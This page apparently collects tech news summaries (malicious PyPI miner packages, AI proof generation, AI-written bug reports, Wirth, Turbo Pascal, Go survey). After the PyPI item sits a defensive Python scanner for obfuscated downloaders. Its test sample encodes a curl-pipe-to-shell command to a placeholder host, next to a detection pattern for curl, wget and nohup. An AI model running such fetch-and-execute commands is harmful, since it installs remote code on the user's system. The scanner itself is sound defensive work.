Python

Three Packages Targeting Linux with Crypto Miners Found in Python's 'PyPi' Repository (thehackernews.com) 17

An anonymous reader shared this report from The Hacker News: Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices.

The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down...

The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run even after exiting the session. "Echoing the approach of the earlier 'culturestreak' package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL," said Fortinet FortiGuard Labs researcher Gabby Xiong. "The payload is then incrementally released in various stages to execute its malicious activities."
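A defender-side triage for the pattern described above, as an added example that is not from the Fortinet report or The Hacker News: it statically parses a package's `__init__.py` (never importing or running it) and flags decoding calls combined with process execution, including base64 literals that decode to shell or URL text. The call lists, the `scan_init_source` name, the scoring rule, and the sample sources with the `example.invalid` host are all assumptions constructed for illustration.

```python
"""Static triage of __init__.py for a decode-then-execute downloader pattern.
Added example: heuristics and sample sources are constructed, not real IoCs."""
import ast
import base64
import binascii
import re

# Assumed heuristic lists; tune for your own environment.
CALL_KINDS = {
    "decode": {"base64.b64decode", "base64.b32decode", "bytes.fromhex", "codecs.decode"},
    "execute": {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
                "subprocess.call", "subprocess.check_output", "exec", "eval"},
    "fetch": {"urllib.request.urlopen", "requests.get", "requests.post"},
}
SHELL_MARKERS = re.compile(r"\b(curl|wget|nohup)\b|https?://")
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _decoded_hint(text):
    """If a string literal is base64 hiding shell/URL text, return the plaintext."""
    if not B64_LITERAL.match(text):
        return None
    try:
        plain = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return plain if SHELL_MARKERS.search(plain) else None


def scan_init_source(source):
    """Parse source text only; nothing from the package is imported or run."""
    tree = ast.parse(source)
    aliases = {}  # local name -> real dotted name, so renamed imports still match
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    findings = {"decode": [], "execute": [], "fetch": [], "hidden": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name:
                head, dot, rest = name.partition(".")
                name = aliases.get(head, head) + dot + rest
                for kind, names in CALL_KINDS.items():
                    if name in names:
                        findings[kind].append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            plain = _decoded_hint(node.value)
            if plain:
                findings["hidden"].append((node.lineno, plain))

    # Flag only when obfuscated content and command execution appear together.
    obfuscated = bool(findings["decode"] or findings["hidden"])
    findings["suspicious"] = obfuscated and bool(findings["execute"])
    return findings


# Constructed samples (placeholder host, never executed, only parsed).
_stage = base64.b64encode(b"curl -s https://example.invalid/stage1.sh | sh").decode()
SUSPICIOUS_SAMPLE = (
    "import os, base64\n"
    f"os.system(base64.b64decode('{_stage}').decode())\n"
)
_blob = base64.b64encode(b"constructed benign configuration blob").decode()
BENIGN_SAMPLE = (
    "import base64\n"
    "__version__ = '1.0'\n"
    f"CONFIG = base64.b64decode('{_blob}')\n"
)
ALIASED_SAMPLE = (
    "from base64 import b64decode as d\n"
    "import subprocess as sp\n"
    "sp.Popen(d(X), shell=True)\n"
)

if __name__ == "__main__":
    for label, src in [("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE),
                       ("aliased", ALIASED_SAMPLE)]:
        print(label, scan_init_source(src))
```

A hit is a reason to review the file before installation, not proof of malice; legitimate packages also decode data and spawn processes.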

Programming

Can AI-Generated Proofs Bring Bug-Free Software One Step Closer? (umass.edu) 61

The University of Massachusetts Amherst has an announcement. A team of computer scientists "recently announced a new method for automatically generating whole proofs that can be used to prevent software bugs and verify that the underlying code is correct." It leverages the AI power of Large Language Models, and the new method, called Baldur, "yields unprecedented efficacy of nearly 66%."

The idea behind the machine-checking technique was "to generate a mathematical proof showing that the code does what it is expected to do," according to the announcement, "and then use a theorem prover to make sure that the proof is also correct. But manually writing these proofs is incredibly time-consuming and requires extensive expertise." "These proofs can be many times longer than the software code itself," says Emily First, the paper's lead author who completed this research as part of her doctoral dissertation at UMass Amherst... First, whose team performed its work at Google, used Minerva, an LLM trained on a large corpus of natural-language text, and then fine-tuned it on 118GB of mathematical scientific papers and webpages containing mathematical expressions. Next, she further fine-tuned the LLM on a language, called Isabelle/HOL, in which the mathematical proofs are written. Baldur then generated an entire proof and worked in tandem with the theorem prover to check its work. When the theorem prover caught an error, it fed the proof, as well as information about the error, back into the LLM, so that it can learn from its mistake and generate a new and hopefully error-free proof.

This process yields a remarkable increase in accuracy. The state-of-the-art tool for automatically generating proofs is called Thor, which can generate proofs 57% of the time. When Baldur (Thor's brother, according to Norse mythology) is paired with Thor, the two can generate proofs 65.7% of the time. Though there is still a large degree of error, Baldur is by far the most effective and efficient way yet devised to verify software correctness, and as the capabilities of AI are increasingly extended and refined, so should Baldur's effectiveness grow.

In addition to First and Brun, the team includes Markus Rabe, who was employed by Google at the time, and Talia Ringer, an assistant professor at the University of Illinois — Urbana Champaign. This work was performed at Google and supported by the Defense Advanced Research Projects Agency and the National Science Foundation.

AI

AI-Assisted Bug Reports Are Seriously Annoying For Developers (theregister.com) 29

Generative AI models like Google Bard and GitHub Copilot are increasingly being used in various industries, but users often overlook their limitations, leading to serious errors and inefficiencies. Daniel Stenberg of curl and libcurl highlights a specific problem of AI-generated security reports: when reports are made to look better and to appear to have a point, it takes longer to research and eventually discard them. "Every security report has to have a human spend time to look at it and assess what it means," adds Stenberg. "The better the crap, the longer time and the more energy we have to spend on the report until we close it." The Register reports: The curl project offers a bug bounty to security researchers who find and report legitimate vulnerabilities. According to Stenberg, the program has paid out over $70,000 in rewards to date. Of 415 vulnerability reports received, 64 have been confirmed as security flaws and 77 have been deemed informative -- bugs without obvious security implications. So about 66 percent of the reports have been invalid. The issue for Stenberg is that these reports still need to be investigated and that takes developer time. And while those submitting bug reports have begun using AI tools to accelerate the process of finding supposed bugs and writing up reports, those reviewing bug reports still rely on human review. The result of this asymmetry is more plausible-sounding reports, because chatbot models can produce detailed, readable text without regard to accuracy.

As Stenberg puts it, AI produces better crap. "A crap report does not help the project at all. It instead takes away developer time and energy from something productive. Partly because security work is considered one of the most important areas so it tends to trump almost everything else." As examples, he cites two reports submitted to HackerOne, a vulnerability reporting community. One claimed to describe Curl CVE-2023-38545 prior to actual disclosure. But Stenberg had to post to the forum to make clear that the bug report was bogus. He said that the report, produced with the help of Google Bard, "reeks of typical AI style hallucinations: it mixes and matches facts and details from old security issues, creating and making up something new that has no connection with reality." [...]

Stenberg readily acknowledges that AI assistance can be genuinely helpful. But he argues that having a human in the loop makes the use and outcome of AI tools much better. Even so, he expects the ease and utility of these tools, coupled with the financial incentive of bug bounties, will lead to more shoddy LLM-generated security reports, to the detriment of those on the receiving end.

Programming

Niklaus Wirth, Inventor of Pascal, Dies At 89 (twitter.com) 96

New submitter axlash writes: It has been reported on X that Niklaus Wirth, inventor and co-inventor of several languages including Pascal, Euler and Oberon, died on Jan 1, 2024. He was aged 89. "We lost a titan of programming languages, programming methodology, software engineering and hardware design," writes software engineer Bertrand Meyer in a post on X. "Niklaus Wirth passed away on the first of January. We mourn a pioneer, colleague, mentor and friend."

Niklaus Wirth, born on February 15, 1934, in Switzerland, is a renowned computer scientist known for his significant contributions to the field of computer science and software engineering. He is best known for developing several programming languages, including ALGOL W, Pascal, and Modula-2, which have had a profound impact on the design and development of modern computer software. Wirth's work emphasized simplicity, clarity, and efficiency in programming languages, which greatly influenced subsequent language design and the development of structured programming techniques. His legacy also includes the development of the Oberon programming language and the design of the Oberon operating system. Wirth's dedication to elegant and efficient software design continues to inspire computer scientists and software engineers worldwide, making him a highly respected figure in the history of computing.

You can learn more about Wirth via A.M. Turing Award, Britannica, and the Computer History Museum.
Software

Since the Demise of Atom, 'Pulsar' Offers an Alternative Code Editor (pulsar-edit.dev) 24

On December 15 GitHub declared end-of-life for its "hackable text editor" Atom. But long-time Slashdot reader BrendaEM wants to remind everyone that after the announcement of Atom's sunset, "the community came together to keep Atom alive."

First there was the longstanding fork Atom-Community. But "due to differences in long-term goals for the editor, a new version was born: Pulsar."

From the Pulsar web site: Pulsar [sometimes referred to as Pulsar-Edit] aims to not only reach feature parity with the original Atom, but to bring Pulsar into the 21st century by updating the underlying architecture, and supporting modern features.

With many new features on the roadmap, once Pulsar is stable, it will be a true, Community-Based, Hackable, Text Editor.

"Of course, the user interface is much of the same," writes the blog It's FOSS, and it's cross-platform (supporting Linux, macOS, and Windows).

"The essentials seem to be there with the documentation, packages, and features like the ability to install packages from Git repositories..."
Programming

Code.org Sues WhiteHat Jr. For $3 Million 8

theodp writes: Back in May 2021, tech-backed nonprofit Code.org touted the signing of a licensing agreement with WhiteHat Jr., allowing the edtech company with a controversial past (Whitehat Jr. was bought for $300M in 2020 by Byju's, an edtech firm that received a $50M investment from Mark Zuckerberg's venture firm) to integrate Code.org's free-to-educators-and-organizations content and tools into their online tutoring service. Code.org did not reveal what it was charging Byju's to use its "free curriculum and open source technology" for commercial purposes, but Code.org's 2021 IRS 990 filing reported $1M in royalties from an unspecified source after earlier years reported $0. Coincidentally, Whitehat Jr. is represented by Aaron Kornblum, who once worked at Microsoft for now-President Brad Smith, who left Code.org's Board just before the lawsuit was filed.

Fast forward to 2023 and the bloom is off the rose, as Court records show that Code.org earlier this month sued Whitehat Education Technology, LLC (Exhibits A and B) in what is called "a civil action for breach of contract arising from Whitehat's failure to pay Code.org the agreed-upon charges for its use of Code.org's platform and licensed content and its ongoing, unauthorized use of that platform and content." According to the filing, "Whitehat agreed [in April 2022] to pay to Code.org licensing fees totaling $4,000,000 pursuant to a four-year schedule" and "made its first four scheduled payments, totaling $1,000,000," but "about a year after the Agreement was signed, Whitehat informed Code.org that it would be unable to make the remaining scheduled license payments." While the original agreement was amended to backload Whitehat's license fee payment obligations, "Whitehat has not paid anything at all beyond the $1,000,000 that it paid pursuant to the 2022 invoices before the Agreement was amended" and "has continued to access Code.org's platform and content."

That Byju's Whitehat Jr. stiffed Code.org is hardly shocking. In June 2023, Reuters reported that Byju's auditor Deloitte cut ties with the troubled Indian Edtech startup that was once an investor darling and valued at $22 billion, adding that a Byju's Board member representing the Chan-Zuckerberg Initiative had resigned with two other Board members. The BBC reported in July that Byju's was guilty of overexpanding during the pandemic (not unlike Zuck's Facebook). Ironically, the lawsuit Exhibits include screenshots showing Mark Zuckerberg teaching Code.org lessons. Zuckerberg and Facebook were once among the biggest backers of Code.org, although it's unclear whether that relationship soured after court documents were released that revealed Code.org's co-founders talking smack about Zuck and Facebook's business practices to lawyers for Six4Three, which was suing Facebook.

Code.org's curriculum is also used by the Amazon Future Engineer (AFE) initiative, but it is unclear what royalties -- if any -- Amazon pays to Code.org for the use of Code.org curriculum. While the AFE site boldly says, "we provide free computer science curriculum," the AFE fine print further explains that "our partners at Code.org and ProjectSTEM offer a wide array of introductory and advance curriculum options and teacher training." It's unclear what kind of organization Amazon's AFE ("Computer Science Learning Childhood to Career") exactly is -- an IRS Tax Exempt Organization Search failed to find any hits for "Amazon Future Engineer" -- making it hard to guess whether Code.org might consider AFE's use of Code.org software 'commercial use.' Would providing a California school district with free K-12 CS curriculum that Amazon boasts of cultivating into its "vocal champion" count as "commercial use"? How about providing free K-12 CS curriculum to children who live where Amazon is seeking incentives? Or if Amazon CEO Jeff Bezos testifies Amazon "funds computer science coursework" for schools as he attempts to counter a Congressional antitrust inquiry? These seem to be some of the kinds of distinctions Richard Stallman anticipated more than a decade ago as he argued against a restriction against commercial use of otherwise free software.
Software

The Beauty of Finished Software (josem.co) 174

Programmer and writer Jose Gilgado writes about WordStar 4.0, a popular word processor from the early 80s that continues to work reliably well. Famously, author George R.R. Martin used the application to write "A Song of Ice and Fire." "It does everything I want a word processing program to do and it doesn't do anything else. I don't want any help. I hate some of these modern systems where you type up a lowercase letter and it becomes a capital. I don't want a capital, if I'd wanted a capital, I would have typed the capital," R.R. Martin said earlier, as we previously covered.

Gilgado argues that WordStar 4.0 embodies the concept of finished software -- a software you can use forever with no unneeded changes. He adds: Sometimes, a software upgrade is a step backward: less usable, less stable, with new bugs. Even if it's genuinely better, there's the learning curve. You were efficient with the old version, but now your most used button is on the other side of the screen under a hidden menu. In a world where constant change is the norm, finished software provides a breath of fresh air. It's a reminder that reliability, consistency, and user satisfaction can coexist in the realm of software development. So the next time you find yourself yearning for the latest update, remember that sometimes, the best software is the one that doesn't change at all.
Programming

Quantum Computing Gets a 'Hard, Cold Reality Check' (ieee.org) 67

A Canadian cybersecurity firm has warned that as soon as 2025, quantum computers could make current encryption methods useless.

But now Slashdot reader christoban shares a "reality check" — an IEEE Spectrum takedown with the tagline "Hype is everywhere, skeptics say, and practical applications are still far away." The quantum computer revolution may be further off and more limited than many have been led to believe. That's the message coming from a small but vocal set of prominent skeptics in and around the emerging quantum computing industry... [T]here's growing pushback against what many see as unrealistic expectations for the technology. Meta's head of AI research Yann LeCun recently made headlines after pouring cold water on the prospect of quantum computers making a meaningful contribution in the near future.

Speaking at a media event celebrating the 10-year anniversary of Meta's Fundamental AI Research team he said the technology is "a fascinating scientific topic," but that he was less convinced of "the possibility of actually fabricating quantum computers that are actually useful." While LeCun is not an expert in quantum computing, leading figures in the field are also sounding a note of caution. Oskar Painter, head of quantum hardware for Amazon Web Services, says there is a "tremendous amount of hype" in the industry at the minute and "it can be difficult to filter the optimistic from the completely unrealistic."

A fundamental challenge for today's quantum computers is that they are very prone to errors. Some have suggested that these so-called "noisy intermediate-scale quantum" (NISQ) processors could still be put to useful work. But Painter says there's growing recognition that this is unlikely and quantum error-correction schemes will be key to achieving practical quantum computers. The leading proposal involves spreading information over many physical qubits to create "logical qubits" that are more robust, but this could require as many as 1,000 physical qubits for each logical one. Some have suggested that quantum error correction could even be fundamentally impossible, though that is not a mainstream view. Either way, realizing these schemes at the scale and speeds required remains a distant goal, Painter says... "I would estimate at least a decade out," he says.

A Microsoft technical fellow believes there are fewer applications where quantum computers can really provide a meaningful advantage, since operating a qubit is magnitudes slower than simply flipping a transistor, which also makes the throughput rate for data thousands or even millions of times slower.

"We found out over the last 10 years that many things that people have proposed don't work," he says. "And then we found some very simple reasons for that."
Christmas Cheer

30 Years of Donald Knuth's 'Christmas Lectures' Are Online - Including 2023's (thenewstack.io) 29

"It's like visiting an old friend for the holidays," according to this article: Approaching his 86th birthday, Donald Knuth — Stanford's beloved computer science guru — honored what's become a long-standing tradition. He gave a December "Christmas lecture" that's also streamed online for all of his fans...

More than 60 years ago, back in 1962, a 24-year-old Donald Knuth first started writing The Art of Computer Programming — a comprehensive analysis of algorithms which, here in 2023, he's still trying to finish. And 30 years ago Knuth also began making rare live appearances each December in front of audiences of Stanford students...

Recently Stanford uploaded several decades of Knuth's past Christmas lectures, along with a series of 22 videos of Knuth from 1985 titled "the 'Aha' Sessions" (courses in mathematical problem-solving). There are also two different sets of five videos from 1981 showing Knuth introducing his newly-created typesetting system TeX. There are even 12 videos from 1982 of what Knuth calls "an intensive course about the internal details."

And on Dec. 6, wearing his traditional brown holiday sweater, Knuth gave yet another live demonstration of the beautifully clear precision that's made him famous.

Christmas Cheer

2023's Online 'Advent Calendars' Challenge Programmers With Tips and Puzzles 8

It's a geek tradition that started online back in 2000. Programming language "advent calendars" offer daily tips about a programming language (if not a Christmas-themed programming puzzle) -- one a day through December 25th.

And 2023 finds a wide variety of fun sites to choose from:
  • For example, there's 24 coding challenges at the Advent of JavaScript site (where "each challenge includes all the HTML and CSS you need to get started, allowing you to focus on the JavaScript.") And there's another 24 coding challenges on a related site... Advent of CSS.
  • The cyber security training platform "TryHackMe.com" even coded up a site they call "Advent of Cyber," daring puzzle-solvers to "kickstart your cyber security career by engaging in a new, beginner-friendly exercise every day leading up to Christmas!"
  • Every year since 2000 there's also been a new edition of the Perl Advent Calendar, and this month Year 23 started off with goodies from Perl's massive module repository, CPAN. (Specifically, its elf-themed story references the Music::MelodicDevice::Ornamentation module -- along with the MIDI::Util library and TiMidity++, a software synthesizer that can play MIDI files without a hardware synthesizer.)
  • The HTMHell site — which bills itself as "a collection of bad practices in HTML, copied from real websites" — is celebrating the season with the "HTMHell Advent Calendar," promising daily articles on security, accessibility, UX, and performance.
Programming

Creator of JSON Unveils New Programming Language 'Misty' (crockford.com) 157

He specified the JSON notation, and developed tools like JSLint and the minifier JSMin. His Wikipedia entry says he was also a senior JavaScript architect at PayPal — but he's probably better known for writing O'Reilly's book JavaScript: the Good Parts.

But Doug Crockford has a new challenge. O'Reilly's monthly tech newsletter says Crockford "has created a new programming language called Misty. It is designed to be used both by students and professional programmers."

The language's official site calls it "a dynamic, general-purpose, transitional, actor language. It has a gentle syntax that is intended to benefit students, as well as advanced features such as capability security and lambdas with lexical scoping..." The language is quite strict in its use of spaces and indentation. In most programming languages, code spacing and formatting are underspecified, which leads to many incompatible conventions of style, some promoting bug formation, and all promoting time-wasting arguments, incompatibilities, and hurt feelings. Misty instead allows only one convention which is strictly enforced. This liberates programmers to focus their attention on more important matters.

Indentation is in increments of 4 spaces. The McKeeman Form is extended by three special rules to make this possible:


indentation
    The spaces required by the current nesting.

increase_indentation
    Append four spaces to the indentation.

decrease_indentation
    Remove four spaces from the indentation.


The indentation is the number of spaces required at the beginning of a line as determined by its nesting level.


indent
    increase_indentation linebreak

outdent
    decrease_indentation linebreak


The linebreak rule allows the insertion of a comment, ends the line, and checks the indentation of the next line. Multiple comments and blank lines may appear wherever a line can end.

Christmas Cheer

Amazon, Etsy, Launch Categories With 'Gifts For Programmers' (thenewstack.io) 20

Long-time Slashdot reader destinyland writes: It's a question that comes up all the time on Reddit. Etsy even created a special page for programmer-themed gift suggestions (showing more than 5,000 results). While CNET sticks to broader lists of "tech gifts" — and a separate list for "Star Wars gifts" — other sites around the web have been specifically honing in on programmer-specific suggestions. (Blue light-blocking glasses... A giant rubber duck... The world's strongest coffee... A printer that transfers digital images onto cheese...)

So while in years past Amazon has said they laughed at customer reviews for cans of uranium, this year Amazon has now added a special section that's entirely dedicated to Gifts for Computer Programmers, according to this funny rundown of 2023's "Gifts for Programmers" (that ends up recommending ChatGPT gift cards and backyard office sheds):

From the article: [Amazon's Gifts for Programmers section] shows over 3,000 results, with geek-friendly subcategories like "Glassware & Drinkware" and "Novelty Clothing"... For the coder in your life, Amazon offers everything from brainteasing programming puzzles to computer-themed jigsaw puzzles. Of course, there's also a wide selection of obligatory funny t-shirts... But this year there's also tech-themed ties and motherboard-patterned socks...

Some programmers, though, might prefer a gift that's both fun and educational. And what's more entertaining than using your Python skills to program a toy robot dog...? But if you're shopping for someone who's more of a cat person, Petoi sells a kit for building a programmable (and open source) cat robot named "Nybble". The sophisticated Arduino-powered feline can be programmed with Python and C++ (as well as block-based coding)... [part of] the new community that's building around "OpenCat", the company's own quadruped robotic pet framework (open sourced on GitHub).

Security

Intelligence Researchers To Study Computer Code for Clues To Hackers' Identities (wsj.com) 4

Government researchers in the U.S. are studying methods to help identify hackers based on the code they use to carry out cyberattacks. From a report: The Intelligence Advanced Research Projects Activity, the lead federal research agency for the intelligence community, plans to develop technologies that could speed up investigations for identifying perpetrators of cyberattacks. "The number of attacks is increasing far more than the number of forensic experts that are available to go after these attacks," said Kristopher Reese, who is managing the research program at IARPA and holds a doctorate in computer science and engineering. The lack of forensic resources means hackers who target small organizations or companies that don't fall under critical infrastructure sectors often escape identification, he said.

Tools that are developed as part of the planned 30-month research project won't replace human analysts, who are crucial for identifying social and political dynamics that might explain why a particular hacking group targeted a victim, Reese said. But using artificial intelligence to analyze code used in cyberattacks will make investigations more efficient, he said. IARPA is accepting pitches from researchers until next month and plans to begin research next summer. [...] There hasn't been enough research into how analyzing code can reveal a hacker's identity, Reese said. Behavioral traits evident in code can reveal specific countries where hackers might be from or even the university where they were trained, he said. Some companies also have style guides outlining how employees should program, which could leave traces that indicate a person worked there, he said.

Security

Lazarus Cyber Group Deploys DLang Malware Strains (theregister.com) 13

Connor Jones reports via The Register: DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, Cisco Talos revealed today. The attacks form part of what's being called "Operation Blacksmith" and are attributed to a group tracked as Andariel, believed to be a sub-division of the Lazarus Group -- North Korea's state-sponsored offensive cyber unit. [...]

The researchers noted that DLang is an uncommon choice for writing malware, but a shift towards newer languages and frameworks is one that's been accelerating over the last few years -- in malware coding as in the larger programming world. Rust, however, has often shown itself to be the preferred choice out of what is a fairly broad selection of languages deemed to be memory-safe. AlphV/BlackCat was the first ransomware group to make such a shift last year, re-writing its payload in Rust to offer its affiliates a more reliable tool. A month later, the now-shuttered Hive group did the same thing, and many others followed after that. Other groups to snub Rust include China-based Sandman which was recently observed using Lua-based malware, believed to be part of a wider shift toward Lua development from Chinese attackers.

Programming

40 years of Turbo Pascal: Memories of the Coding Dinosaur that Revolutionized IDEs (theregister.com) 113

TechSpot remembers that Turbo Pascal "stands out as one of the first instances of an integrated development environment (IDE), providing a text-based interface through which developers could write their code, compile it, and finally link it with runtime libraries." The early IDE, written in Assembly, eschewed the use of floppies, instead building the code directly in RAM for an unprecedented performance boost.

The language demonstrated superior speed, greater convenience, and a more affordable price compared to its competition. Philippe Kahn, Borland's CEO who initially conceptualized turning the new language into an all-in-one product, decided to sell the software via mail orders for just $49.95, establishing a market presence for the then-newly founded company.

It was called "Turbo" because its use of RAM made it considerably faster, adds the Register: Anders Hejlsberg, who would later go on to join Microsoft as part of the C# project, is widely credited as creator of the language, with Borland boss Philippe Kahn identifying the need for the all-in-one tool...

Version 1 had limitations. Source code files, for example, were limited to 64 KB. It would only produce .COM executable files for DOS and CP/M — although other architectures and operating systems were supported. It would also run from a single floppy disk, saving users from endless swapping in a world where single drives were the norm and a hard disk seemed impossibly exotic — and expensive... However, it was with version 4, in 1987, that Turbo Pascal changed dramatically. For one, support for CP/M and CP/M-86 was dropped, and the compiler would generate .EXE executables under DOS, lifting the .COM restrictions...

For this writer, 1989's version 5.5 was peak Turbo Pascal. Object-oriented programming features turned up, including classes and inheritance, and a step-by-step debugger. Version 6 and 7 brought in inline assembly and support for the creation of Windows executables and DLLs respectively, but version 7 also marked the end of the line as far as Borland was concerned. Turbo Pascal for Windows would turn up, but was eventually superseded by Delphi.

However, the steamroller of tools such as Visual Basic 3 ensured that Borland never had the same success in Windows that it enjoyed under DOS. As for Turbo Pascal, several versions were eventually released by Borland as freeware including version 1 for DOS, 5.5, and 7.

I once took a computer programming course taught entirely in Pascal. (Functions, subroutines, and procedures...)

Any Slashdot readers have their own memories to share about Pascal?
IBM

Can IBM's Watson Translate the World's 60-Year-Old Cobol Code? (pcmag.com) 120

"Every day, 3 trillion dollars worth of transactions are handled by a 64-year-old programming language that hardly anybody knows anymore," writes PC Magazine. But most schools don't teach the mainframe programming language COBOL any more, and "COBOL cowboys" are aging out of the workforce, with replacements in short supply.

"This is precisely the kind of problem that IBM thinks it can fix with AI." IBM's approach is fairly straightforward: Rather than relying exclusively on a limited pool of human programmers to solve the problem, it built a generative AI-powered code assistant (watsonx) that helps convert all that dusty old COBOL code to a more modern language, thereby saving coders countless hours of reprogramming. In extremely simplified terms, the process is similar to feeding an essay written in English into ChatGPT and asking it to translate certain paragraphs into Esperanto. It allows programmers to take a chunk of COBOL and enlist watsonx to transform it into Java.

But of course, it's not quite that simple in practice... After IBM and the customer have a thorough understanding of the application landscape, the data flow, and the existing dependencies, "we help them refactor their applications," says IBM's Vice President of Product Management, IT Automation, Keri Olson. "That is, breaking it down into smaller pieces, which the customer can selectively choose, at that point, to do the modernization from COBOL to Java." Skyla Loomis, IBM's Vice President of IBM Z Software adds, "But you have to remember that this is a developer assistant tool. It's AI assisted, but it still requires the developer. So yes, the developer is involved with the tooling and helping the customers select the services."

Once the partnership between man and machine is established, the AI steps in and says, 'Okay, I want to transform this portion of code.' The developer may still need to perform some minor editing of the code that the AI provides, Loomis explains. "It might be 80 or 90 percent of what they need, but it still requires a couple of changes. It's a productivity enhancement — not a developer replacement type of activity."

The article quotes a skeptical Gartner Distinguished Vice President and Analyst, who notes that IBM "has no case studies, at this time, to validate its claims."
Programming

Go Programmers Surveyed: Most Use Linux or MacOS (go.dev) 29

The Go team conducted a survey of Go Developers in August — and has just released the results. Among the findings: "90% of survey respondents saying they felt satisfied while working with Go during the prior year," while 6% said they were dissatisfied. Further, the number of people working with Go continues to increase; we see evidence of this from external research like Stack Overflow's Developer Survey (which found 14% of professional developers worked with Go during the past year, a roughly 15% year-over-year increase), as well as analytics for go.dev (which show an 8% rise in visitors year-over-year). Combining this growth with a high satisfaction score is evidence that Go continues to appeal to developers, and suggests that many developers who choose to learn the language feel good about their decision long afterwards...

As in prior years, the majority of survey respondents told us they work with Go on Linux (63%) and macOS (58%) systems... We do continue to see that newer members of the Go community are more likely to be working with Windows than more experienced Go developers. We interpret this as a signal that Windows-based development is important for onboarding new developers to the Go ecosystem, and is a topic our team hopes to focus on more in 2024...

While x86-compatible systems still account for the majority of development (89%), ARM64 is also now used by a majority of respondents (56%). This adoption appears to be partly driven by Apple Silicon; macOS developers are now more likely to say they develop for ARM64 than for x86-based architectures (76% vs. 71%). However, Apple hardware isn't the only factor driving ARM64 adoption: among respondents who don't develop on macOS at all, 29% still say they develop for ARM64.

The most-preferred code editors among the surveyed Go programmers were VS Code (44%), GoLand (31%), Vim/Neovim (16%), and Emacs (3%). 52% of the survey's respondents actually selected "very satisfied" for their feelings about Go — the highest possible rating.

Other interesting findings:
  • "The top requests for improving toolchain warnings and errors were to make the messages more comprehensible and actionable; this sentiment was shared by developers of all experience levels, but was particularly strong among newer Go developers."
  • "Three out of every four respondents work on Go software that also uses cloud services; this is evidence that developers see Go as a language for modern, cloud-based development."
  • The experimental gonew tool (which offers predefined templates for instantiating new Go projects) "appears to solve critical problems for Go developers (especially developers new to Go) and does so in a way that matches their existing workflows for starting a new project. Based on these findings, we believe gonew can substantially reduce onboarding barriers for new Go developers and ease adoption of Go in organizations."
  • And when it comes to AI, "Go developers said they are more interested in AI/ML tooling that improves the quality, reliability, and performance of code they write, rather than writing code for them."

AI

Millions of Coders Are Now Using AI Assistants. How Will That Change Software? (technologyreview.com) 78

AI coding assistants are here to stay -- but just how big a difference they make is still unclear. From a report: Thomas Dohmke, GitHub's CEO: "You've got a lot of tabs open, you're planning a vacation, maybe you're reading the news. At last you copy the text you need and go back to your code, but it's 20 minutes later and you lost the flow." The key idea behind Copilot and other programs like it, sometimes called code assistants, is to put the information that programmers need right next to the code they are writing.

The tool tracks the code and comments (descriptions or notes written in natural language) in the file that a programmer is working on, as well as other files that it links to or that have been edited in the same project, and sends all this text to the large language model behind Copilot as a prompt. (GitHub co-developed Copilot's model, called Codex, with OpenAI. It is a large language model fine-tuned on code.) Copilot then predicts what the programmer is trying to do and suggests code to do it. This round trip between code and Codex happens multiple times a second, the prompt updating as the programmer types. At any moment, the programmer can accept what Copilot suggests by hitting the tab key, or ignore it and carry on typing. The tab button seems to get hit a lot. A study of almost a million Copilot users published by GitHub and the consulting firm Keystone Strategy in June -- a year after the tool's general release -- found that programmers accepted on average around 30% of its suggestions, according to GitHub's user data.

[...] Copilot has changed the basic skills of coding. As with ChatGPT or image makers like Stable Diffusion, the tool's output is often not exactly what's wanted -- but it can be close. "Maybe it's correct, maybe it's not -- but it's a good start," says Arghavan Moradi Dakhel, a researcher at Polytechnique Montreal in Canada who studies the use of machine-learning tools in software development. Programming becomes prompting: rather than coming up with code from scratch, the work involves tweaking half-formed code and nudging a large language model to produce something more on point.

Christmas Cheer

150,000 Programmers Tackle 'Advent of Code' in Event's 9th Year (adventofcode.com) 16

"Advent of Code" has begun. New programming puzzles will appear every day until Christmas at AdventOfCode.com — and the annual event (first started in 2015) has grown into a worldwide phenomenon. This year's first puzzle has been completed by over 150,000 programmers (with another 115,652 completing Day Two's puzzle). And 108,000 fans have also joined the Advent of Code subReddit.

Contest-related comments are popping up all around the web. Some participants are live streaming their puzzle-solving efforts on Twitch. Self-described computer nerd Gary Grady is tweeting cartoons about each day's puzzle. JetBrains is even giving away some prizes in their "Advent of Code with Kotlin" event. And JetBrains developer advocate Sebastian Aigner is also hosting daily livestreams about each puzzle.

It's hard to overstate how big this event has become. This year's event attracted 60 sponsors, including Kotlin (for the third consecutive year), as well as Spotify, Shopify, and Sony Interactive Entertainment (as well as JPMorgan Chase, Bank of America, and American Express). Individual donors can get a special badge next to their name, and there's also a shop selling coffee mugs and t-shirts. But at its core is real-world developer Eric Wastl (plus a team of loyal beta-testers) sharing his genuine fondness for computer programming. Wastl is also the creator of a satirical web page for the fast, lightweight, cross-platform framework Vanilla JS ("so popular that browsers have been automatically loading it for over a decade") and also curates a collection of "things in PHP which make me sad".

And you can find him on X sharing encouraging comments for this year's participants.
Programming

Java Tries a New Way to Use Multithreading: Structured Concurrency (infoworld.com) 96

"Structured concurrency is a new way to use multithreading in Java," reports InfoWorld.

